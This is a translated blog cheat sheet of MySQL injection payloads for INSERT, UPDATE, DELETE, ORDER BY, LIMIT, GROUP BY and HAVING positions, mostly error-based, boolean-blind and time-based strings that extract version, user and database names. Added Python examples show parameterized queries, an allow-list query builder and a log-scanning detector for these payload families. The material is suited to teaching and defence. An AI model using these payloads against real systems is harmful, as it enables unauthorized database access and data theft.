• MySQL injection in INSERT, UPDATE, DELETE, ORDER BY and GROUP BY


    Insert:

    Syntax: INSERT INTO table_name (col1, col2, ...) VALUES (val1, val2, ...)

    Error-based injection:

    insert into test(id,name,pass) values (6,'xiaozi' or updatexml(1,concat(0x7e,(database()),0x7e),0) or '', 'Nervo');

    insert into test(id,name,pass) values (6,'xiaozi' or extractvalue(1,concat(0x7e,database())) or '', 'Nervo');

    Blind injection:

    // blind injection works off whether the expression between the two "or"s evaluates true
    'or 1=1 or '   // the injected text runs as part of the SQL and the value of the whole expression is what gets stored; the condition holds, so 1 is stored
    'or 1=2 or '   // the condition fails, so 0 is stored
    ' or exists(select * from information_schema.tables) or'   // stores 1
    aaa' or length(database())=11 or '   // true
    aaa' or mid(database(),1,1)='t' or'   // true
    aaa' or mid(database(),1,11)='test' or '   // true

    insert into test(id,name,pass) values (2,'mis1','' or ascii(mid(database(),1,1))=116 or '')

    Time-based blind injection:

    insert into test(id,name,pass) values (2,'mis1','' or if(mid(database(),1,1)='a',sleep(10),0) or '')

    Update:

    update test set pass='baidu' or updatexml(1,concat(0x7e,(version()),0x7e),0) or '' WHERE id=2 and name='0';

    update test set pass='baidu' or extractvalue(1,concat(0x7e,database())) or '' WHERE id=2 and name='0';

    Delete:

    DELETE FROM test WHERE id=2 or updatexml(1,concat(0x7e,(version()),0x7e),0) or '';

    DELETE FROM test WHERE id=2 or extractvalue(1,concat(0x7e,database())) or '';
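    The INSERT, UPDATE and DELETE statements above are only injectable because the user's text is spliced into the SQL string. The Python script below is an added example written for this page, not code from the original post: it uses SQLite in place of MySQL (updatexml, extractvalue and sleep do not exist in SQLite, but the `' or ... or '` shape from the blind-injection section evaluates the same way) and stores the post's test value once through a concatenated statement and once through a parameterized one, so the difference shows up in the row itself. The table and column names follow the post; the helper names and sample inputs are my own.

```python
import sqlite3

# Constructed sample inputs: what a user might submit in the "name" field.
SAFE_NAME = "xiaozi"
TAMPERED_TRUE = "xiaozi' or 1=1 or '"    # condition holds -> the OR evaluates to 1
TAMPERED_FALSE = "xiaozi' or 1=2 or '"   # condition fails -> the OR evaluates to 0


def make_db():
    """In-memory SQLite stand-in for the post's MySQL 'test' table (assumed schema)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE test (id INTEGER, name TEXT, pass TEXT)")
    return conn


def stored_name(conn, user_id):
    """Read back what actually landed in the 'name' column."""
    row = conn.execute("SELECT name FROM test WHERE id = ?", (user_id,)).fetchone()
    return None if row is None else str(row[0])


def insert_concat(conn, user_id, name, password):
    """Vulnerable: untrusted text is pasted into the statement, so a quote ends
    the literal and the remainder is parsed as SQL (the 0/1 oracle from the post)."""
    sql = f"insert into test(id,name,pass) values ({int(user_id)},'{name}','{password}')"
    conn.execute(sql)
    return stored_name(conn, user_id)


def insert_param(conn, user_id, name, password):
    """Hardened: bound parameters travel as data; the engine never parses them."""
    conn.execute(
        "insert into test(id,name,pass) values (?,?,?)",
        (user_id, name, password),
    )
    return stored_name(conn, user_id)


def update_concat(conn, user_id, new_pass):
    """Vulnerable UPDATE, same shape as the 'baidu' example above."""
    conn.execute(f"update test set pass='{new_pass}' where id={int(user_id)}")
    row = conn.execute("SELECT pass FROM test WHERE id = ?", (user_id,)).fetchone()
    return str(row[0])


def update_param(conn, user_id, new_pass):
    """Hardened UPDATE with bound parameters."""
    conn.execute("update test set pass=? where id=?", (new_pass, user_id))
    row = conn.execute("SELECT pass FROM test WHERE id = ?", (user_id,)).fetchone()
    return str(row[0])


if __name__ == "__main__":
    db = make_db()
    print("concat, true  ->", insert_concat(db, 1, TAMPERED_TRUE, "Nervo"))   # 1
    print("concat, false ->", insert_concat(db, 2, TAMPERED_FALSE, "Nervo"))  # 0
    print("param         ->", insert_param(db, 3, TAMPERED_TRUE, "Nervo"))    # the literal text
    print("update concat ->", update_concat(db, 3, "baidu' or 1=1 or '"))     # 1
    print("update param  ->", update_param(db, 3, "baidu' or 1=1 or '"))      # the literal text
```

    The concatenated path stores "1" or "0", the value of the OR expression, which is exactly the signal the blind-injection section reads off; the parameterized path stores the text verbatim, quotes and all, because the engine never sees it as SQL.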

    Order by:

    order by [id]   --- [injection point]

    SELECT username FROM users WHERE isadmin = 0 GROUP BY username ORDER BY 1 and (select count(*) from information_schema.columns group by concat(version(),0x27202020,floor(rand(0)*2-1)))

    order by [id] desc/asc   --- [injection point]

    SELECT username FROM users WHERE isadmin = 0 GROUP BY username ORDER BY 1 desc ,(select count(*) from users group by concat(version(),0x27202020,floor(rand(0)*2-1)))
    

      

    Limit 0,1:

    SELECT field FROM table WHERE id > 0 ORDER BY id LIMIT [injection point]

    Error-based injection (PROCEDURE ANALYSE() only exists on MySQL 5.x; it was removed in 8.0, so the LIMIT-position payloads below do not apply there):

    mysql> SELECT field FROM user WHERE id >0 ORDER BY id LIMIT 1,1 procedure analyse(extractvalue(rand(),concat(0x3a,version())),1);
    ERROR 1105 (HY000): XPATH syntax error: ':5.5.41-0ubuntu0.14.04.1'

    If the injection point does not surface errors, a time-based payload works as well:

    SELECT username FROM users WHERE isadmin = 0 limit 0,1 procedure analyse(extractvalue(rand(),concat(0x3a,(IF(MID(database(),1,1) LIKE 'w', BENCHMARK(5000000,SHA1(1)),5)))),1);
    

      

    Group by:

    group by username   -- [injection point]

    SELECT username FROM users WHERE isadmin = 0 GROUP BY username and (select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,schema_name,0x7e) FROM information_schema.schemata LIMIT 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)#

    Having:

    Having 1=1   -- [injection point]

    SELECT username FROM users WHERE isadmin = 0 GROUP BY username having 1=1 and (select count(*) from information_schema.columns group by concat(version(),0x27202020,floor(rand(0)*2-1)))
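    ORDER BY, LIMIT, GROUP BY and HAVING (the four sections above) are the positions where the usual fix does not reach: a bound parameter in ORDER BY or GROUP BY is a constant string, not a column reference, so the sort and grouping columns and the direction cannot be parameterized and have to be checked against an allow-list instead, while LIMIT and OFFSET can be bound as integers. The Python builder below is an added example written for this page, not code from the post: SQLite stands in for MySQL, the `users` table and its columns follow the post's queries, and the `ALLOWED_*` sets, sample rows and helper names are my own. It refuses the ORDER BY, LIMIT and GROUP BY shapes shown above before any SQL text exists.

```python
import sqlite3

# Allow-lists: the only identifiers the application will ever place in the
# ORDER BY / GROUP BY positions. Anything else is rejected outright.
ALLOWED_COLUMNS = {"id", "username"}
ALLOWED_DIRECTIONS = {"asc", "desc"}

# Constructed sample rows for the post's "users" table.
SAMPLE_ROWS = [
    (1, "alice", 0),
    (2, "bob", 0),
    (3, "carol", 1),
    (4, "bob", 0),
]


def build_user_query(sort_col, direction="asc", group_col=None, limit=10, offset=0):
    """Return (sql, params). Identifiers come from allow-lists; numbers are bound."""
    if sort_col not in ALLOWED_COLUMNS:
        raise ValueError(f"sort column not allowed: {sort_col!r}")
    direction = direction.lower()
    if direction not in ALLOWED_DIRECTIONS:
        raise ValueError(f"sort direction not allowed: {direction!r}")
    if group_col is not None and group_col not in ALLOWED_COLUMNS:
        raise ValueError(f"group column not allowed: {group_col!r}")
    # LIMIT/OFFSET must be non-negative integers. bool is excluded explicitly
    # because it subclasses int in Python.
    for n in (limit, offset):
        if isinstance(n, bool) or not isinstance(n, int) or n < 0:
            raise ValueError(f"limit/offset must be a non-negative int: {n!r}")

    sql = "SELECT username FROM users WHERE isadmin = ?"
    params = [0]
    if group_col is not None:
        sql += f" GROUP BY {group_col}"
    sql += f" ORDER BY {sort_col} {direction} LIMIT ? OFFSET ?"
    params += [limit, offset]
    return sql, tuple(params)


def run_user_query(**kwargs):
    """Execute the built query against an in-memory copy of the sample table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER, username TEXT, isadmin INTEGER)")
    conn.executemany("INSERT INTO users VALUES (?,?,?)", SAMPLE_ROWS)
    sql, params = build_user_query(**kwargs)
    return [row[0] for row in conn.execute(sql, params)]


def is_rejected(**kwargs):
    """True when the builder refuses the arguments."""
    try:
        build_user_query(**kwargs)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    print(run_user_query(sort_col="username", direction="desc"))
    print(run_user_query(sort_col="username", group_col="username"))
    # Anything that is not a bare allow-listed identifier is refused:
    print(is_rejected(sort_col="1 and (select 1)"))
    print(is_rejected(sort_col="id", direction="desc ,(select 1)"))
    print(is_rejected(sort_col="id", limit="1 procedure analyse()"))
```

    The point of `is_rejected` is that the check happens on the identifier, not on the finished SQL: there is no escaping step to get wrong, because a value that is not literally one of the allow-listed names never reaches the query string.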
    

     

    MySQL error-based injection:

    1. floor()-based error (the count()/rand()/group by duplicate-key trick; the derived table it runs over needs at least three rows for the key collision to happen, which is why information_schema.tables or an explicit three-row union is used)

    and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);

    and (select count(*) from (select 1 union select null union select !1)x group by concat((select table_name from information_schema.tables limit 1),floor(rand(0)*2)));

    2. ExtractValue

    and extractvalue(1, concat(0x5c,(select user())))

    3. UpdateXml

    and 1=(updatexml(1,concat(0x3a,(select user())),1))

    4. NAME_CONST

    and exists(select*from (select*from(select name_const(@@version,0))a join (select name_const(@@version,0))b)c)

    5. join-based error (the self-join produces duplicate column names in the derived table, and the resulting error message names the column; each USING() clause removes one duplicate and exposes the next)

    mysql> select *  from(select * from users a join users b)c;
    mysql> select *  from(select * from users a join users b using(id))c;

    mysql> select *  from(select * from users a join users b using(id,name))c;

    MySQL boolean blind injection:

    #select * from test where id =2 and length(version())=6
    #select * from test where id =2 and ascii(substring(version(),7,1))>1

    #select * from test where id =2 and length(database())=4
    #select * from test where id =2 and ascii(mid(database(),4,1))=116

    #select * from test where id =2 and (select length(version()))=6
    #select * from test where id =2 and (select count(*) from test)=3

    MySQL time-based blind injection:

    #select * from test where id =2 and if(ascii(substring(user(),1,1))=114,benchmark(10000000,SHA1(1)),0)
    #select * from test where id =2 and if(ascii(substring(user(),1,1))=114,sleep(1),0)

    #select * from test where id =2 and if(substring(user(),1,1)='r',sleep(5),0)
    #select * from test where id =2 and if(substring(user(),1,1)=char(11),sleep(5),0)
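    Seen from the defender's side, the error-based and blind payload families in this post share a small vocabulary (updatexml/extractvalue/name_const, floor(rand(...)), sleep/benchmark, information_schema, and the `' or ... or '` boolean form), which makes them easy to triage in web server access logs. The scanner below is an added example written for this page, not code from the post: it extracts the request target from a few constructed combined-format log lines (addresses, paths and timestamps are made up; the query strings carry the shapes from this page), URL-decodes it twice so double-encoded requests read the same as single-encoded ones, and tags each line by family. The family names and regexes are my own and are meant as a triage aid, not as proof of exploitation.

```python
import re
from urllib.parse import unquote_plus

# Request-target extractor for Apache/Nginx combined-format lines.
REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) ')

# Signature families built from the payload shapes in this post.
SIGNATURES = {
    "error_based": re.compile(
        r"\b(?:updatexml|extractvalue|name_const)\s*\(|\bfloor\s*\(\s*rand\s*\(", re.I),
    "time_based": re.compile(r"\b(?:sleep|benchmark)\s*\(", re.I),
    "boolean_or": re.compile(r"'\s*or\s+.+?\s+or\s*'", re.I),
    "info_schema": re.compile(r"\binformation_schema\.", re.I),
}

# Constructed sample log lines (hosts, paths and times are made up).
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Jan/2024:10:00:00 +0000] "GET /search?q=xiaozi HTTP/1.1" 200 512',
    '10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /search?q=xiaozi%27%20or%20updatexml(1%2Cconcat(0x7e%2Cdatabase())%2C0)%20or%20%27 HTTP/1.1" 500 87',
    '10.0.0.5 - - [01/Jan/2024:10:00:02 +0000] "GET /list?order=1%20desc%2C(select%20count(*)%20from%20users%20group%20by%20concat(version()%2C0x27%2Cfloor(rand(0)*2-1))) HTTP/1.1" 200 2048',
    '10.0.0.5 - - [01/Jan/2024:10:00:03 +0000] "GET /item?id=2%20and%20if(substring(user()%2C1%2C1)%3D%27r%27%2Csleep(5)%2C0) HTTP/1.1" 200 301',
    '10.0.0.7 - - [01/Jan/2024:10:00:04 +0000] "GET /search?q=xiaozi+or+Nervo HTTP/1.1" 200 640',
]


def decode_request(line):
    """Pull the request target out of a log line and URL-decode it twice so
    double-encoded payloads are inspected in the same form as plain ones."""
    m = REQUEST_RE.search(line)
    if not m:
        return ""
    return unquote_plus(unquote_plus(m.group(1)))


def classify(line):
    """Return the sorted list of signature families that match the line."""
    text = decode_request(line)
    return sorted(name for name, rx in SIGNATURES.items() if rx.search(text))


def scan(lines):
    """(line number, families) for every line that matches at least one family."""
    hits = []
    for number, line in enumerate(lines, start=1):
        families = classify(line)
        if families:
            hits.append((number, families))
    return hits


if __name__ == "__main__":
    for number, families in scan(SAMPLE_LOG):
        print(f"line {number}: {', '.join(families)}")
```

    The last sample line is a plain search for "xiaozi or Nervo" and is left alone: the boolean rule is anchored on the quote characters rather than on the word "or", which is what keeps ordinary text from lighting up the rule. A 500 status next to an error_based hit (line 2) is the combination worth looking at first, since it means the database error actually reached the client.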

    About me: a network security enthusiast committed to sharing original, high-quality material. Follow my personal WeChat public account, Bypass--, for more articles.


  • Original post: https://www.cnblogs.com/xiaozi/p/5536562.html